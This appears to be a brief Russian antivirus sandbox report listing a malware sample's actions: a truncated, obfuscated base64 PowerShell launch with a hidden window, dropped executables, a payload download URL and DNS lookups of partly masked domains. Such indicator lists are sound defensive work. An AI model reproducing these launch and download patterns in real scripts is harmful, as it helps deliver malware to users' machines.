Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQBUAC0AaQB0AGUATQAgACAAdgBhAFIASQBhAEIAbABlADoAOABMAGkAIAAgACgAIABbAHQAWQBwAEUAXQAoACcAUwB5ACcAKwAnAFMAVAAnACsAJwBFACcAKwAnAE0AJwArACcALgBpAE8ALgBEAEkAJwArACcAUg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1556
- %TEMP%\1081398.cvr
- %HOMEPATH%\dd0gpvs\uguofb7\row8yn.exe
- %HOMEPATH%\dd0gpvs\uguofb7\row8yn.exe
- %HOMEPATH%\dd0gpvs\uguofb7\row8yn.exe
- http://77##ns.club/wp-content/4y/
- DNS ASK yi###course.com
- DNS ASK es###ohouse.com
- DNS ASK 77##ns.club
- DNS ASK la###roup.net
- DNS ASK zi####migration.com
- DNS ASK vi####otpulsa.com
- DNS ASK wi###omhub.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQBUAC0AaQB0AGUATQAgACAAdgBhAFIASQBhAEIAbABlADoAOABMAGkAIAAgACgAIABbAHQAWQBwAEUAXQAoACcAUwB5ACcAKwAnAFMAVAAnACsAJwBFACcAKwAnAE0AJwArACcALgBpAE8ALgBEAEkAJwArACcAUg...' (со скрытым окном)